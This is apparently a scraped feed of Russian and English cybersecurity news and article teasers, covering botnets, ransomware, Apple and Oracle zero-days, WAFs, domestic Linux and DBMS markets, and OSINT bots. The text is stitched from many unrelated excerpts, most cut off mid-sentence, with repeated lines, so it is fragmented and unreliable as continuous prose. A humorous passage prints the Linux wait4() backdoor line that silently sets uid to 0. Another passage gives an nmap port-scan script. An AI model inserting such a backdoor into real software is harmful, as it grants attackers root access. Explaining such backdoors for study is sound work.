Вдохновение из природы открыло путь для новых технологий.

Генетический анализ показал связь современных организмов с древностью.

Свет + материя =... ?

Одноклеточные организмы раскрывают секреты стволовых клеток.

Тот случай, когда ваш телефон выступает главным инструментом хакеров.

Корпорацию обвиняют в намеренном удалении доказательств и сокрытии фактов.

Госдума обсуждает законопроект, который меняет порядок подачи заявлений.

Минцифры анонсировала создание новой платформы для защиты от атак.

Неуместные кнопки замечены на снимках в шокирующих статьях.

Как создаются обширные вредоносные сети на десятки тысяч IoT-девайсов?

Бизнес обяжут поддержать образование

Почему посылки больше не доходят до владельцев?

Новая эра партнёрства формирует уникальный стратегический союз.

Новая инициатива направлена на защиту от мошенников.

Создатель программы-вымогателя предстанет перед судом.

Появление Linux на ARM при достижении определённого уровня производительности SoC позволило таким системам выйти и на серверный рынок.

Сейчас минимальная стоимость Windows-ноутбука на ARM составляет около 700 долларов США, тогда как система сопоставимой производительности на x86-64 обойдётся вдвое дешевле.

В Linux ситуация с ПО для ARM не столь остра, но и для этой платформы значительная часть коммерческих программ не поддерживает данную архитектуру.

ВыводыПерспективы у PC на архитектуре ARM, безусловно, есть — особенно на фоне проблем, которые испытывают Intel и (в меньшей степени) AMD.

С другой стороны, и у ARM есть пока объективные трудности, связанные с развитием экосистемы Windows для …

Реалии рынка СУБД в РоссииПосле ухода западных вендоров рынок СУБД столкнулся с трудностями, но в настоящее время начинает восстанавливаться, отмечает Евгений Ярош.

Новые идеи и технологии, такие как облачные вычисления и микросервисная архитектура, позволяют эффективно решать современные задачи, включая обработку больших объёмов данных и обеспечение высокой доступности.

Любой проект по миграции уникален, так как каждая организация имеет свои специфические требования, структуры данных и бизнес-процессы, отмечает Евгений Ярош.

Ключевую роль в успешной миграции исполняет грамотный инженер, обладающий глубокими знаниями как в области технологий, так и в специфике бизнеса.

ВыводыРазвитие россий…

Рассмотрим, что нового разработчики добавили в Astra Linux 1.8, но первым делом обозначим ключевые возможности.

Инфографика поддержки устройств и процессоров в Astra LinuxВариант поставки Astra Linux для рабочих станций — один из самых востребованных на рынке.

Вариант применения Astra Linux в терминале банкаИз преимуществ Astra Linux Embedded можно выделить:Поддержку основных процессорных архитектур и популярных аппаратных компонентов.

Схема оформления Astra Proxima в Astra LinuxСхема Astra Proxima предлагается в трёх цветовых вариантах: светлая, тёмная и служебная.

«Параметры системы» → «Учётная запись» в Astra LinuxНастройки учётной записи — часть большого раздела системных настроек Astra…

ЦФА могут быть привязаны к традиционным активам (например, акциям), но также могут и существовать независимо от них.

Ещё в начале 2020 года ЦФА в России воспринимались как нечто экзотическое, связанное с криптовалютами и не имеющее чёткого правового статуса.

Нормативная правовая база ЦФА в РоссииВ отличие от традиционных финансовых инструментов, ЦФА не требуют сложных и длительных бюрократических процедур выпуска.

Путь в сторону правового регулирования цифровых финансовых активов в России начался в 2018 году.

В марте 2024 года Владимир Путин утвердил закон, который разрешает применение ЦФА в международных платежах.

Максим Морарь, Orion softУгрозы и риски для контейнерной инфраструктурыАртём Чернов выделил рост сложности векторов атак, а также сосредоточенность злоумышленников на цепочках поставок и на оркестраторах контейнеров.

Безопасность контейнеров и стандартыНикита Ладошкин отметил, что клиенты могут ориентироваться на международные стандарты и лучшие практики по безопасности контейнеров, такие как CIS Kubernetes Benchmark, NIST 800-190 и PCI DSS.

Эксперт выделил здесь три ключевых аспекта:Анализ сетевого трафика контейнеров на предмет аномальной активности (сканирование сети, C&C, эксфильтрация данных).

Kubernetes потихоньку обрастает функциями безопасности в базе, а в приложениях их ещё нескоро…

Работа WAF по сигнатурамАнализ трафика приложений по сигнатурам заключается в использовании определённых правил, которые представлены в виде регулярных выражений.

На просторах последнего можно найти самые распространённые сигнатуры WAF для разных типов уязвимостей.

Модель OSIПри сравнении Anti-Bot и WAF различий в функциональности меньше, но они всё ещё присутствуют.

ВыводыМы разобрали несколько методов эффективной работы с WAF: разные сценарии защиты и перспективы обучения WAF с использованием технологий искусственного интеллекта.

Несмотря на то что классический подход всё ещё в приоритете и занимает большую часть рынка, бурное развитие технологий может в будущем оказать значительную помощ…

В любом случае вам будет интересно узнать, какие риски влекут за собой теневые ИТ и сможет ли справиться с подобными угрозами корпоративный браузер.

Если же работник забыл или не знал, как отозвать приглашение, то конфиденциальная информация может остаться у покинувших компанию сотрудников, что тоже создаёт риски утечек.

Третий вариант — использовать корпоративный браузер, в котором можно регулировать доступ ко внешним сервисам и управлять им.

Корпоративный браузер против теневых ИТВо-первых, используя корпоративный браузер, не придётся отказываться от не одобренных службой ИБ интернет-ресурсов и сервисов.

При обоих подходах правильно настроенный корпоративный браузер станет удобным инструм…

MultiDirectory — мультиплатформенная служба каталогов с открытым исходным кодом и свободной лицензией от российского вендора МУЛЬТИФАКТОР.

MultiDirectory совместима с различными сетевыми протоколами и сервисами, что позволяет ей работать как в локальной сети, так и в облачной среде.

Применение MultiDirectoryСлужба каталогов от МУЛЬТИФАКТОР подходит для создания и администрирования корпоративных каталогов в компаниях с распределёнными структурами из разных сфер.

Работа с облачным сервисом HRBOX через MULTIFACTOR и MultiDirectoryПортал MULTIFACTOR связывается с системой каталогов MultiDirectory, что обеспечивает работу с учётными записями сотрудников через централизованный LDAP-каталог.

Прове…

Что такое харденинг и как он помогает защититься от угрозХарденинг — это процесс усиления безопасности кoмпьютерных систем и сетей.

Харденинг рассматривается как важная часть процесса внедрения встроенных мер безопасности, что помогает защитить системы на всех уровнях, добавил Виталий Масютин.

Харденинг помогает защититься от известных угроз с минимальными усилиями, устраняя или смягчая наиболее распространённые риски, что, в свою очередь, повышает безопасность.

Обеспечение сетевой безопасности и харденинг требуют таких знаний и навыков, которых у обычных администраторов не бывает.

Харденинг — это постоянный процесс, требующий регулярно проводить аудиты безопасности и пентесты для выявления…

Рынок систем автоматизированного проектирования (САПР) в России только начинает приходить в себя после пропажи продукции зарубежных вендоров, которая доминировала в «тяжёлом» сегменте.

Это привело к самому настоящему тектоническому сдвигу в процессе разработки САПР не только в России, но и в мировом масштабе.

Новейшая версия Delta Design 4 может работать не только в Windows, но и в Linux, в том числе отечественной Astra Linux.

Между тем уровень проникновения технологий BIM в России оценивается лишь в 26 %, что кратно ниже, чем, например, в Британии или Сингапуре.

В ряде секторов, в частности BIM, так и не появилось решений, функциональность которых соответствовала бы уровню зарубежных проду…

Организационная подготовка:создание чётких норм и стандартов по безопасности,регулярное повышение осведомлённости сотрудников о киберугрозах,создание команд по работе с инцидентами,реализация и разработка комплекса мероприятий по безопасности.

Адаптация стратегии — необходимо своевременно анализировать и обновлять стратегию безопасности в соответствии с изменениями в бизнесе и технологической среде.

Также Positive Technologies предлагает услуги по мониторингу и аудиту безопасности инфраструктуры для выявления и предотвращения атак, обнаружения аномальной активности.

Атаки на инфраструктуру приводят к серьёзным последствиям, наносят урон репутации и приводят к уничтожению данных.

Однако благ…

Организациям необходимо обеспечить комплексный подход к безопасности, который будет включать в себя как технологические решения, так и организационные изменения.

Комплексный подход к безопасности включает в себя внедрение современных технологий, таких как системы обнаружения и предотвращения вторжений, антивирусные программы и средства шифрования данных.

Подготовка к кибератакамДля обеспечения безопасности компании необходимо подготовить инфраструктуру к отражению атак, отмечает Дмитрий Кокорин.

Любой компании желательно иметь несколько планов действий — сразу после инцидента, при локализации угрозы и на этапе восстановления системы, добавил Михаил Климов.

В условиях быстро развивающегося к…

Рассмотрим сценарии использования R-Vision VM на основных этапах процесса управления уязвимостями, обращая внимание на новые возможности, которые она предлагает.

Применение R-Vision VM 5.4Система R-Vision VM обладает интуитивно понятным интерфейсом, что позволяет настроить процесс управления уязвимостями и адаптировать его под потребности конкретной организации в соответствии с корпоративными стандартами и требованиями.

Настройки проверок в режиме «чёрного ящика» в R-Vision VM 5.4Применение перебора паролей позволяет оценить надёжность парольной защиты элементов информационной инфраструктуры.

Информация об уязвимости в R-Vision VM 5.4ДашбордыПредустановленные панели мониторинга R-Vision VM …

Сегодня расскажем вам о нестандартном подходе к защите веб-приложений с помощью PT Application Firewall PRO (PT AF PRO).

Мы с коллегами столкнулись с интересной задачей: как защитить уязвимое приложение от вредоносных JSON-запросов.

Каждый новый специалист проходит «боевое крещение»: и с кодом ковыряется, и с настройками WAF играет, и атаку проводит, и защиту настраивает.

Однако в случае с PT AF PRO единственный выход — обрабатывать весь JSON-файл как единый текстовый блок.

И если WAF не умеет работать с JSON, а проверять параметры запроса нужно, то регулярка — вполне подходящее решение.

Разбирая очередной инцидент, связанный с атакой шифровальщика, и услышав в очередной раз вопрос «как же так, ведь у нас есть антивирус!

В этой статье расскажем про участившиеся атаки DсHelp, рассмотрим тактики и техники данной группы, а также отметим, почему антивирус — не панацея и как легитимное ПО может быть использовано против вас.

При успешной атаке на инфраструктуру злоумышленники связываются с пострадавшими посредством e-mail, Telegram или иным способом и требуют приобрести пароль, чтобы вернуть доступ к данным.

Также злоумышленники ищут информацию о паролях в доступных для чтения файлах и в каталогах, используя встроенные в операционные системы механизмы поиска, а также ищут сохране…

iPhone с iOS 18 приказывают другим iPhone с более старыми версиями iOS перезагружаться по беспроводному соединению!

Если модуль ядра AppleSEPKeyStore обнаруживает, что iPhone по-прежнему включён после того, как должна была выполниться перезагрузка, возникает паника ядра.

обнаруживает, что iPhone по-прежнему включён после того, как должна была выполниться перезагрузка, возникает паника ядра.

В iOS 18.2 строку «inactivity_reboot» сменили на «inactivity_reboot_enabled», что намекает о дополнительных потенциальных изменениях в новых бетах iOS 18.2.Пока мне было непонятно только одно: через какое время срабатывает inactivity reboot?

В последней версии Ghidra тоже есть хорошая поддержка ядра iOS,…

Компания UserGate, ведущий российский разработчик экосистемы ИБ-решений, представила новое поколение решений класса NGFW — линейку высокопроизводительных межсетевых экранов следующего поколения (Next-Generation Firewall) для крупных корпоративных заказчиков и центров обработки данных UserGate DCFW (Data Center Firewall).

Особенности UserGate DCFWUserGate DCFW — специализированный NGFW для заказчиков, нуждающихся в высокопроизводительном, функциональном и отказоустойчивом решении для защиты корпоративных сетей и ЦОДов.

Другое важное отличие UserGate DCFW — применение первого в России аппаратного ускорителя на базе FPGA для NGFW.

Вентиляторы спроектированы UserGate и могут работать как на вду…

Также поговорим о перспективах технологий верификации личности в мире, где «доверяй, но проверяй» превратилось в «не доверяй и перепроверяй дважды».

Они позволили:автоматизировать мошенничество;увеличить масштаб, а с ним и рентабельность старых невыгодных схем;повысить реалистичность и убедительность обмана.

Модераторы YouTube спохватились слишком поздно: к моменту удаления ролик несколько часов провисел в топе, а в кошельке мошенников успела скопиться изрядная сумма.

Зато мошенники точно продолжат оттачивать свои навыки и на компаниях, и на обычных людях.

За одно упоминание интернета по паспортам и регистрации блогеров могут закидать помидорами, и не без оснований.

Специфика киберугроз: кто, кого и как атакуетАтаки киберпреступников на Ближнем Востоке отличает более разрушительный характер.

Кроме того, в период с конца 2023 по вторую половину 2024 года наши эксперты наблюдали значительное влияние геополитической обстановки в регионе на активность киберпреступников.

Какие страны чаще всего становились целями кибератакЕсли в начале конфликта целями хакеров становились в основном Израиль и Палестина, то затем действия злоумышленников распространились и на другие страны.

Шпионское ПО хакеры использовали как для кражи личных и финансовых данных, так и для слежки за политическими активистами и журналистами.

Проблемы в основном обусловлены недостаточной защи…

LinalgOps.cpp 502В последнем вызове функции повторно используется arg1:bool tailInteger = isInteger(arg0) && isInteger(arg1) && isInteger(arg1);Код читается тяжело, что и является причиной опечатки.

И ещё такие же опечаточкиStringRef ARMAsmParser::splitMnemonic(StringRef Mnemonic, ....) { .... if (isMnemonicVPTPredicable(Mnemonic, ExtraToken) && Mnemonic != "vmovlt" && Mnemonic != "vshllt" && Mnemonic != "vrshrnt" && Mnemonic != "vshrnt" && Mnemonic != "vqrshrunt" && Mnemonic != "vqshrunt" && Mnemonic != "vqrshrnt" && Mnemonic != "vqshrnt" && Mnemonic != "vmullt" && Mnemonic != "vqmovnt" /*** <= ***/ && Mnemonic != "vqmovunt" && Mnemonic != "vqmovnt" /*** <= ***/ && Mnemonic != "vmovnt" && …

Однако многие (как и мы до того, как написать эту статью) путают такие термины, как Deep Links, Web Links и App Links, что может привести к ошибкам в реализации и уязвимостям.

Чтобы реализовать поддержку Deep Links в Android, необходимо добавить соответствующий intent-filter в манифест приложения, который определит, какая Activity будет обрабатывать данную ссылку.

И тут должно было быть детальное описание всех атак и уязвимостей, которые возникают при ошибках в выставлении App Links.

Единственное, чего нам удалось добиться — это превращение App Links в обычные Web Links, которое влечет за собой появление диалога "устранения неоднозначности".

ЗаключениеОтсутствие подтверждения домена у App L…

Однако я не могу раскрыть название программы и домен, так как не получил разрешения на их публикацию.

Прочитав его (200 000 строк кода), я выяснил, что он также использует JWT для аутентификации.

И я обнаружил https://admin.test.com/upload , который возвращал 403 Forbidden.

Сначала я подумал, что это конец, поскольку невозможно определить, куда был загружен мой файл.

Множество файлов размещается на xxxxxxxx.cloudfront.net, и как атакующий, я могу изменять содержимое этих файлов.

Threat Intelligence берет данные из всевозможных открытых и закрытых источников, от общедоступных баз данных до хакерских форумов и Darkweb’а.

Интеграция фидов Threat Intelligence помогает правильно распределять ресурсы и концентрировать усилия на действительно критичных инцидентах, что уменьшает нагрузку на команду безопасности.

По оценкам экспертов Threat Intelligence и Лаборатории компьютерной криминалистики F.A.C.C.T., время реагирования на инциденты сокращается на 10-40% при использовании данных Threat Intelligence.

Описания к основным коллекциям:Категория “Утечки”АккаунтыХакеры используют фишинговые веб-сайты и вредоносное ПО для ПК и Android для кражи логинов и паролей.

Threat Intell…

Рост числа атак на центробанки различных стран, в том числе на поддерживаемые ими национальные платежные системы.

Увеличится количество атак на смартфоны, направленных на кражу денежных средств.

Количество атак подобного рода на персональных компьютерах снижается, в то время как количество финансовых атак на мобильные устройства за 2024 год удвоилось.

На прошлой неделе эксперты «Лаборатории Касперского» опубликовали список прогнозов по развитию киберугроз на 2025 год.

Проблемы в ПО, для которых не существует патча, таким образом, остаются важным инструментом организаторов атак.Еще одним верным прогнозом стало массовое использование технологий машинного обучения киберпреступниками.

Рассмотренные в этой статье боты в основном будут касаться разведки по пользователям в Telegram.

Попробуем осуществить поиск по истории аккаунта, это будет стоить 10 билетов.

К примеру UserBox как базу данных для своего приложения, Unamer как наступательный бот в разведке Telegram аккаунта, так же как и SangMata.

Еще полезные статьи по теме:- Анализ Telegram аккаунтов- Боты и сервисы для разведки данных Вконтакте- Автоматизация поиска аккаунта в телеграм через номер.

Простой поиск людей через телеграм- Поиск по почте и никнейму- OSINT: Разведка в ЕВРОПЕПолезные OSINT инструменты в телеграме (всегда рабочие ссылки)

И для таких вот любителей олдскульных делал пынгвин копию своих ядер в CVS — чтобы, значца, и тому дать, и ентому.

И вот смотрит в один прекрасный ноябрьский денёк гордый птиц пынгвин в сундук свой старый, CVS кличущийся, и ластой голову скребёт, ибо видит он в ядре своём изменение — а вот откуда оно в сундуке том взялось — в упор не видит.

И вот что он углядел в коде функции wait4() :+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;Первый раз посмотрел на это дело пынгвин, да плечами пожал.

Вот и пынгвин сначала так же думал.

И вообще, сказка — ложь, да в ней намёк, добру молодцу про опасность попутать операторы сравнения и присваивания урок, не любо — не слуш…

Эксперименты, провед`нные с использованием квантового компьютера D-Wave Advantage, позволили успешно осуществить атаки на три репрезентативных алгоритма структуры SPN: PRESENT, GIFT-64 и RECTANGLE, и успешно проведён поиск интегральных отличителей до 9 раунда.

Результаты экспериментов показывают, что алгоритм квантового отжига превосходит традиционные эвристические алгоритмы глобальной оптимизации, такие как имитационный отжиг, по способности избегать локальных минимумов и по времени решения.

Это первая практическая атака на несколько полномасштабных алгоритмов симметричных шифров со структурой SPN с использованием реального квантового компьютера.

Преимущественно используется для решения за…

В таких случаях я предлагаю концепцию "6P" — простой и эффективный подход, помогающий сфокусироваться на пяти основных аспектах информационной безопасности и тем самым повысить уровень защищенности компании.

Personnel Awareness (Осведомленность сотрудников)Я абсолютно уверен, что осведомленность сотрудников — один из наиболее важных аспектов информационной безопасности.

Даже самые дорогие и сложные технологии не смогут защитить компанию, если люди не будут понимать, что такое безопасность и как они могут ей способствовать.

Даже самые продвинутые технические меры могут быть бесполезными, если персонал не осознает угроз и не соблюдает основные правила безопасности.

Пентесты — важный инструмен…

Исследователям удалось разобраться в инфраструктуре ботнета Ngioweb, который поставляет десятки тысяч прокси хакерскому сервису NSOCKS и впервые был обнаружен еще в 2017 году.

С тех пор сразу несколько ИБ-компаний обратили внимание, что многие прокси NSOCKS напрямую связаны с ботнетом Ngioweb, хотя далеко не все его управляющие серверы удавалось обнаружить.

А ботнет Ngioweb обеспечивает сервис примерно 80% из 35 000 прокси, которые разбросаны по 180 странам мира.

В частности, эти C&C-серверы проверяют пропускную способность ботов, а также подключают их к backconnect-серверу, который делает их доступными для NSOCKS.

По словам экспертов, в настоящее время работа Ngioweb и NSOCKS нарушена, пос…

Хакеры опубликовали на BreachForums 44 000 записей с информацией о клиентах Ford.

В компании заявили, что уже проводят расследование возможной утечки данных.

Публикация появилась на BreachForums в минувшие выходные: хакер с ником EnergyWeaponUser заявил, что он и другой известный злоумышленник (IntelBroker) взломали компанию Ford в ноябре 2024 года и похитили данные.

Напомним, что только в последние месяцы IntelBroker брал на себя ответственность за атаки на такие компании как Cisco, Nokia и T-Mobile, и сливал украденные у них данные.

В итоге в открытый доступ оказались выложены 44 000 записей клиентов Ford, содержащих полные имена, физические адреса, данные о покупках, информацию о дилерах…

Мы обна­ружи­ли в его про­шив­ке уяз­вимость перепол­нения кучи при обра­бот­ке сооб­щений про­токо­ла Secure UserPlane Location (SUPL), переда­ваемых в виде SMS.

Этот баг поз­воля­ет выпол­нить про­изволь­ный код на уров­не опе­раци­онной сис­темы модема с мак­сималь­ными при­виле­гиями — дос­таточ­но отпра­вить все­го пять SMS через сеть опе­рато­ра.

Даже при­мер­ный спи­сок девай­сов сос­тавить слож­но, пос­коль­ку модель модема не всег­да ука­зана в докумен­тации.

Мы не мог­ли читать память или отла­живать про­шив­ку, одна­ко мы обна­ружи­ли, что при падении в регистр R0 попада­ют кон­тро­лиру­емые нами дан­ные.

Для авто­мати­зации про­цес­са мы соб­рали стенд, и в ито­ге счи­тыва­ние и…

Обнаружен вымогатель Helldown, который проникает в корпоративные сети через уязвимости в брандмауэрах Zyxel.

Впервые Helldown был описан аналитиками компании Cyfirma летом 2024 года, а в октябре о его работе уже рассказывали исследователи из компании Cyberint.

По их словам, пока этот шифровальщик не входит в число основных игроков на вымогательском «рынке», он быстро набирает обороты, а на сайте злоумышленников появляются сообщения о новых жертвах.

Изучая активность Helldown, аналитики Sekoia обнаружили, что по крайней мере восемь жертв, перечисленных на сайте вымогателей, использовали брандмауэры Zyxel в качестве точек доступа к IPSec VPN на момент атак.

Исходя их этих данных, специалисты …

В документах перечислены не только устройства на базе iOS, против которых эффективен или неэффективен Graykey, но и устройства на базе Android.

Также документы показывают, что Graykey менее эффективен против iPhone с бета-версиями: инструмент не работает против различных бета-версий iOS 18.1 на всех современных моделях iPhone.

Неизвестно, связано ли это с тем, что на момент создания документа разработчики просто не успели проработать атаки против iOS 18.1, или с тем, что в версии 18.1 была заметно улучшена безопасность.

Возможности Graykey против устройств на базе Android куда более разнообразны, в силу значительных различий между устройствами, выпускаемых разными производителями.

AFU означ…

Компания Apple выпустила экстренные патчи для исправления сразу двух уязвимостей нулевого дня, которые уже использовались в атаках на системы Mac на базе Intel.

0-day были обнаружены в компонентах macOS Sequoia JavaScriptCore (CVE-2024-44308) и WebKit (CVE-2024-44309).

Обе проблемы представляли угрозу только для систем Mac на базе Intel и были устранены в составе macOS Sequoia 15.1.1.

Поскольку те же уязвимые компоненты встречаются и в других ОС Apple, также патчи получили iOS 17.7.2 и iPadOS 17.7.2, iOS 18.1.1 и iPadOS 18.1.1, а также visionOS 2.1.1.

Теперь, с учетом этих уязвимостей, разработчики Apple устранили уже шесть 0-day багов в 2024 году.

Стало известно, что израильская компания NSO Group, занимающаяся разработкой шпионского ПО (включая нашумевший Pegasus), использовала сразу несколько 0-day эксплоитов для WhatsApp.

Несколько лет назад мы посвятили Pegasus и NSO Group отдельную статью, после того как внимание общественности оказалось привлечено к работе этой коммерческой спайвари и связанными с ней злоупотреблениями.

В мае 2019 года представители WhatsApp выяснили, что Eden использовался клиентами NSO Group для атак примерно на 1400 пользовательских устройств.

Обнаружив упомянутые атаки, разработчики WhatsApp исправили уязвимости, на которые полагался Eden и отключили учетные записи NSO Group в WhatsApp.

А развертывание спай…

Национальный центр кибербезопасности Швейцарии (NCSC) предупредил, что через почтовую службу страны распространяется малварь: люди получают бумажные письма с вредоносными QR-кодами.

В этих письмах адресатам предлагается отсканировать QR-код и загрузить «Приложение для предупреждения о неблагоприятных погодных условиях» для Android, которое имитирует настоящее погодное приложение Alertswiss.

Приложение, размещено не в официальном магазине Google Play, а на стороннем сайте и скрывает в себе разновидность трояна Coper, впервые обнаруженного еще в 2021 году.

Учитывая, что отправка одного такого письма в Швейцарии стоит примерно 1,35 доллара, можно предположить, что мошенники использовали письма…

Такие фальшивы генераторы изображений заражают Windows и macOS малварью Lumma и AMOS, которая затем используется для кражи учетных данных и информации криптовалютных кошельков.

Напомним, что Lumma представляет собой инфостилер для Windows, а AMOS — для macOS.

Кликнув на такое изображение или видео, пользователь попадает на фальшивый сайт EditProAI: editproai[.

Поэтому рекомендуется немедленно сбросить все учетные данные, установив новые и уникальные пароли для всех сайтов и сервисов.

Также рекомендуется включить многофакторную аутентификацию особенно на криптовалютных биржах, в почтовых сервисах, банках и на других важных сайтах.

Са­мые веселые баги мож­но най­ти там, где их ник­то не ждал, — нап­ример, в популяр­ных решени­ях управле­ния дос­тупом, таких как FreeIPA.

FreeIPA — это плат­форма для управле­ния иден­тифика­цией и дос­тупом поль­зовате­лей в сети, которая час­то при­меня­ется для цен­тра­лизо­ван­ного кон­тро­ля прав и аутен­тифика­ции.

Ког­да я в рам­ках пен­теста получил учет­ную запись из домена на FreeIPA, ока­залось, что прав у учет­ки поч­ти нет.

Вспом­нив про метод под­бора паролей, извес­тный как Kerberoasting, я запус­тил hashcat, но и в этом слу­чае ничего не выш­ло — даже при извес­тном пароле для моего поль­зовате­ля.

Так­же я обна­ружил, что FreeIPA работа­ет толь­ко с AES256, что грус­тно.

Детальный анализ трафика показал, что для взлома использовались две опасные уязвимости в системе видеоконференцсвязи (ВКС) VINTEO.

В итоге выяснилось, что в атаке использовали сразу две 0-day уязвимости.

Первая была связана с внедрением SQL-кода (BDU:2024-08421, 9,8 баллов по шкале CVSS 3.0), а вторая (BDU:2024-08422, 8,1 баллов по шкале CVSS 3.0) — с выполнением произвольного кода с максимальными правами в системе.

Комбинация этих проблем позволяла злоумышленниками выполнять вредоносный код без авторизации в системе.

Но благодаря записи исходного трафика в PT NAD во время расследования мы смогли установить вектор эксплуатации неизвестной ранее уязвимости, которую злоумышленники использовал…

Исследователи заметили, что злоумышленники все чаще прикладывают к своим письмам вложения в формате SVG (Scalable Vector Graphics).

И при открытии в браузере такой файл сгенерирует графику, описанную в коде.

Злоумышленники скрывают вредоносный код в SVG уже много лет.

Однако теперь специалисты MalwareHunterTeam и издание Bleeping Computer сообщают, что обнаружили признаки новой кампании (1, 2) и признаки того, что злоумышленники все чаще прибегают к помощи файлов SVG в своих фишинговых операциях.

Также были замечены вложения SVG со встроенным JavaScript, который использовался для автоматического перенаправления браузера на фишинговые сайты сразу после открытия изображения.

На данный момент известно, что [атака не оказала] значительного влияния на системы и данные T-Mobile, и у нас нет доказательств того, что была затронута информация наших клиентов, — заявили в T-Mobile изданию The Wall Street Journal.

Более того, журналисты писали, что злоумышленники могли прослушать телефоны высокопоставленных сотрудников органов нацбезопасности США и политиков, а также похищать журналы звонков, текстовые сообщения и даже аудиозаписи.

Однако представители Cisco утверждают, что не обнаружили никаких признаков того, что их оборудование было скомпрометировано во время этих атак.

К примеру, в январе 2023 года компания сообщила, что хакеры похитили личную информацию 37 млн ее кл…

Специалисты The Shadowserver Foundation обнаружили ботнет, который атакует уязвимость нулевого дня в устаревших устройствах GeoVision, чтобы впоследствии использовать их для DDoS-атак и майнинга криптовалюты.

По словам исследователей, замеченный ботнет использует вариацию малвари Mirai, которая обычно применяется для создании DDoS-платформ или майнинга.

Проблема получила идентификатор CVE-2024-11120 (9,8 балла по шкале CVSS) и была обнаружена специалистами The Shadowserver Foundation.

По данным The Shadowserver Foundation, в настоящее время сети можно обнаружить около 17 000 устройств GeoVision, которые уязвимы перед CVE-2024-11120.

Большинство из них находятся в США (9100), а за ними следу…

Справка: сканирование портовСка­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке.

Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение.

На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap.

Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:#!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1

Threat actors are increasingly banking on a new technique that leverages near-field communication (NFC) to cash out victim's funds at scale.

The technique, codenamed Ghost Tap by ThreatFabric, enables cybercriminals to cash-out money from stolen credit cards linked to mobile payment services such as Google Pay or Apple Pay and relaying NFC traffic.

"This means that even without your physical card or phone, they can make payments from your account anywhere in the world."

Once in possession of the card details, the threat actors move to link the card to Google Pay or Apple Pay.

This is accomplished by means of a legitimate research tool called NFCGate, which can capture, analyze, or modify NF…

The Rise of Non-Human Identities in CybersecurityBy 2025, non-human identities will rise to be the primary attack vector in cybersecurity.

Introducing NHIDRRecognizing the unique challenges posed by NHIs, Entro developed Non-Human Identity Detection and Response (NHIDR) to address this critical security gap.

Proactive Security for a New EraNHIDR represents a paradigm shift from reactive to proactive security.

ConclusionNHIDR technology is revolutionizing cybersecurity by providing real-time detection, automated responses, and a proactive approach to securing non-human identities.

With NHIDR, organizations can safeguard their assets, maintain compliance, and stay ahead of the threat landscap…

Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user interaction.

The vulnerabilities are believed to have existed since the introduction of interpreter support in needrestart 0.8, which was released on April 27, 2014.

However, in CVE-2024-11003 needrestart passes attacker-controlled input (filenames) to Module::ScanDeps and triggers CVE-2024-10224 with root privilege.

"These vulnerabilities in the needrestart utility allow local users to escalate their privileges by executing arbitrary code during package install…

Microsoft has announced a new Windows Resiliency Initiative as a way to improve security and reliability, as well as ensure that system integrity is not compromised.

One of the most important features is Quick Machine Recovery that's expected to be available to the Windows Insider Program community in early 2025.

In another noteworthy update, Microsoft said it's introducing new capabilities that will allow security tools to be run in user mode, just like regular apps, as opposed to relying on kernel access.

Redmond further said it's working with endpoint security partners to take specific steps to bolster resilience as part of what's called the Microsoft Virus Initiative (MVI).

"This event …

Cybersecurity company CrowdStrike is tracking the adversary under the name Liminal Panda, describing it as possessing deep knowledge about telecommunications networks, the protocols that undergird telecommunications, and the various interconnections between providers.

The threat actor's malware portfolio includes bespoke tools that facilitate clandestine access, command-and-control (C2), and data exfiltration.

"SGSNs are essentially GPRS network access points, and the emulation software allows the adversary to tunnel traffic via this telecommunications network."

The end goal of these attacks is to collect network telemetry and subscriber information or to breach other telecommunications ent…

Apple has released security updates for iOS, iPadOS, macOS, visionOS, and its Safari web browser to address two zero-day flaws that have come under active exploitation in the wild.

Not much is known about the exact nature of the exploitation, but Apple has acknowledged that the pair of vulnerabilities "may have been actively exploited on Intel-based Mac systems."

The updates are available for the following devices and operating systems -iOS 18.1.1 and iPadOS 18.1.1 - iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and l…

Oracle is warning that a high-severity security flaw impacting the Agile Product Lifecycle Management (PLM) Framework has been exploited in the wild.

The vulnerability, tracked as CVE-2024-21287 (CVSS score: 7.5), could be exploited sans authentication to leak sensitive information.

"If successfully exploited, this vulnerability may result in file disclosure."

There is currently no information available on who is exploiting the vulnerability, the targets of the malicious activity, and how widespread these attacks are.

In light of active exploitation, users are recommended to apply the latest patches as soon as possible for optimal protection.

According to Trend Micro, the botnet comprises over 20,000 IoT devices as of October 2024, with Water Barghest using it to find and infiltrate vulnerable IoT devices using automated scripts and deploy the Ngioweb malware, registering them as a proxy.

The infected bots are then enlisted for sale on a residential proxy marketplace.

"The monetization process, from initial infection to the availability of the device as a proxy on a residential proxy marketplace, can take as little as 10 minutes, indicating a highly efficient and automated operation," researchers Feike Hacquebord and Fernando Mercês said.

The botnet employs a two-tiered architecture: The first being a loader network comprising 1…

Malicious actors are exploiting misconfigured JupyterLab and Jupyter Notebooks to conduct stream ripping and enable sports piracy using live streaming capture tools.

The attacks involve the hijack of unauthenticated Jupyter Notebooks to establish initial access, and perform a series of actions designed to facilitate illegal live streaming of sports events, Aqua said in a report shared with The Hacker News.

The covert piracy campaign within interactive environments widely used for data science applications was discovered by the cloud security firm following an attack against its honeypots.

"Next, the attacker executed FFmpeg to capture live streams of sports events and redirected them to the…

In this blog, we explore why managing privileged access alone is insufficient and provide actionable insights to help you craft a security-first strategy for privileged access.

Why Managing Privileged Access Isn't EnoughAs cyber threats grow more sophisticated, relying solely on PAM to secure privileged accounts is inadequate.

Real-Time Enforcement: The Future of Privileged Access SecurityA security-first approach to privileged access extends beyond PAM's traditional limitations, focusing on proactive protection rather than reactive management.

Key Features of a Secure Privileged Access StrategyTo build a robust privileged access strategy, consider solutions that provide the following capab…

